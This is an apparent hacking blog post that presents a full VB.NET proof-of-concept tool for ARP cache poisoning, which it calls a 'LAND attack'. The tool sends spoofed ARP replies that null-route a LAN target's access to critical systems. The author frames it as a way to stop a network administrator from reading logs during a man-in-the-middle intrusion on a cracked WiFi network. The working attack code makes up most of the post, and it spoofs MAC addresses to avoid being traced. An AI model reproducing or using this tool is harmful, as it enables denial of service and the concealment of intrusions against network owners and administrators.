ARP Land Attack

Yeah, you know the deal.
Another network-based attack! This time, a LAND-attack (Local Area Network Denial – attack).
I know the first thing that comes to your mind is:
“LAME. With a MITM (Man-in-the-Middle), you can at least steal data, with this you simply DoS someone…”
Not so fast.
I’ve actually found this quite useful.
It requires a very small amount of packets to null-route a remote computer (remote; as in, a computer on the LAN you don’t have physical access to).
Imagine this scenario:
  1. You found an encrypted WiFi-network.
  2. You cracked it.
  3. You got it in and started MITM’ing.
  4. However! The administrator notices, and starts checking the logs.
  5. What to do?!
  6. You get paranoid and stop.
But. What if.
…the administrator is unable to access the logs?
…because his ARP-cache tells him the remote logs is on his local computer?
Whose paranoid then?
This is a PoC of how you can poison the evil-administrators routes to critical systems (the systems you’re after?); back to himself.

001    Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.
002    Module ARP_Land_Attack
003        Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
004        Private Adapters As New Adapters 'An instance of the NIC-enumuration.
005        Private TargetMAC As String 'Targets MAC-address.
006        Private TargetIP As Net.IPAddress 'Targets IPv4-address.
007        Private NullRoutes As New ArrayList 'List of addresses to disable.
008        Private Structure Route
009            Dim IP As Net.IPAddress
010            Dim MAC As String
011        End Structure
012        Sub Main()
013            ShowNICs()
014            ChooseNIC()
015            ChooseTarget() 'Who will we attack?
016            MakeNullroutes() 'What routes should we attack?
017            Nullroute() 'Attack!
018        End Sub
019        Private Sub ChooseTarget()
020            Dim Dummy As String = vbNullString
021            Do
022                Console.WriteLine()
023                Console.WriteLine("< Enter the targets IPv4:")             Console.Write("> ")
024                Dummy = Console.ReadLine
025            Loop Until nokitel.Format.IsIPv4(Dummy)
026            TargetMAC = nokitel.Parse.ARP.GetMAC(Dummy, NIC.IP)
027            TargetIP = nokitel.Format.StringToIPAddress(Dummy)
028        End Sub
029        Private Sub MakeNullroutes()
030            Dim Dummy As String = vbNullString
031            Dim ExitSub As Boolean = False
032            Console.WriteLine()
033            Console.WriteLine("< Write ""start"" to poison the target.")
034            Do
035                Do
036                    Console.WriteLine("< Enter an IPv4 to nullroute:")                 Console.Write("> ")
037                    Dummy = Console.ReadLine
038                    If Not String.IsNullOrEmpty(Dummy) Then
039                        If nokitel.Format.RegexMatch(Dummy, "launch|start|attack|destroy|poison|kill|exterminate") Then
040                            ExitSub = True
041                            Exit Do
042                        End If
043                    End If
044                Loop Until nokitel.Format.IsIPv4(Dummy)
045                If ExitSub Then
046                    If NullRoutes.Count > &H0 Then
047                        Exit Do
048                    Else
049                        Console.WriteLine("! Enter atleast one route to poison.")
050                        ExitSub = Not ExitSub
051                    End If
052                Else
053                    Dim Entry As New Route
054                    With Entry
055                        .IP = nokitel.Format.StringToIPAddress(Dummy) 'The IP-address to poison
056                        .MAC = nokitel.Parse.ARP.GetMAC(.IP.ToString, NIC.IP) 'The corresponding MAC-address attached to the IP.
057                        If String.IsNullOrEmpty(.MAC) Then .MAC = "00:00:00:00:00:00" 'If the ARP-request fails, we simply make a "blackhole".
058                    End With
059                    NullRoutes.Add(Entry) 'Add the route to the stack.
060                End If
061            Loop
062            Console.WriteLine()
063        End Sub
064        Private Sub Nullroute()
065            Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
066            Dim ARP As New nokitel.Parse.ARP.ARP
067            Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
068            Do
069                For Each Route As Route In NullRoutes
070                    With Ethernet
071                        .DestinationMAC = TargetMAC
072                        .SourceMAC = nokitel.Format.RandomMAC 'Spoof that it's not us. Who knows?
073                        .Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
074                    End With
075                    With ARP
076                        .HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
077                        .Operation = nokitel.Parse.ARP.OPCODES.Reply
078                        .ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
079                        .HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
080                        .ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
081                        .SenderHardwareAddress = TargetMAC 'Set the route's IP to the targets own MAC-address.
082                        .SenderProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
083                        .TargetHardwareAddress = Route.MAC
084                        .TargetProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
085                        Console.WriteLine("Poisoning " & TargetIP.ToString & "'s ARP-Cache ### " & Route.IP.ToString & " -=> " & TargetMAC)
086                    End With
087                    nokitel.Parse.Ethernet.Make(Payload, Ethernet) 'Grab the structures and convert them to raw-bytes.
088                    nokitel.Parse.ARP.Make(Payload, ARP)
089                    NIC.Send(Payload) 'Send the bogus packets!
090                Next
091                System.Threading.Thread.Sleep(2000) 'Sleep for a while, we don't need to be quick.
092            Loop
093        End Sub
094        Private Sub ShowNICs()
095            For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
096                With Adapters.Enumurate(Index)
097                    Console.WriteLine("* ID:            " & Index)
098                    Console.WriteLine("* Name:          " & .Name)
099                    Console.WriteLine("* Description:   " & .Description)
100                    Console.WriteLine("* GUID:          " & .GUID)
101                    Console.WriteLine("* Netmask:       " & .Netmask)
102                    Console.WriteLine("* Destination:   " & .DestinationAddress)
103                    Console.WriteLine("* Broadcast:     " & .BroadcastAddress)
104                    Console.WriteLine("* IP:            " & .IP)
105                    Console.WriteLine("* MAC:           " & .MAC)
106                    Console.WriteLine("* Gateway IP:    " & .GatewayIP)
107                    Console.WriteLine("* Gateway MAC:   " & .GatewayMAC)
108                    Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
109                End With
110                Console.WriteLine()
111            Next
112        End Sub
113        Private Sub ChooseNIC()
114            Dim ID As String = vbNullString
115            Do
116                Console.Write("> ")
117                ID = Console.ReadLine
118                If IsNumeric(ID) Then
119                    If ID >= &H0 And ID < Adapters.Enumurate.Length Then
120                        NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
121                        If Not NIC.Open(, False) Then
122                            Console.WriteLine("x Unable to hook device!")
123                            End
124                        End If
125                        Exit Do
126                    End If
127                End If
128            Loop
129        End Sub
130    End Module


Yeah, the code is a bit long. Sorry for that.
But I hope you understand the scenario.
Note: His ARP-Cache get restored almost instantly after you quit the attack. So no real harm done.
A pre-compiled Win32 executable can be downloaded from here.
And here’s a screenshot of how I nullified my laptop:



source:h.ackack


Category Article

What's on Your Mind...

Thank f' u C0mment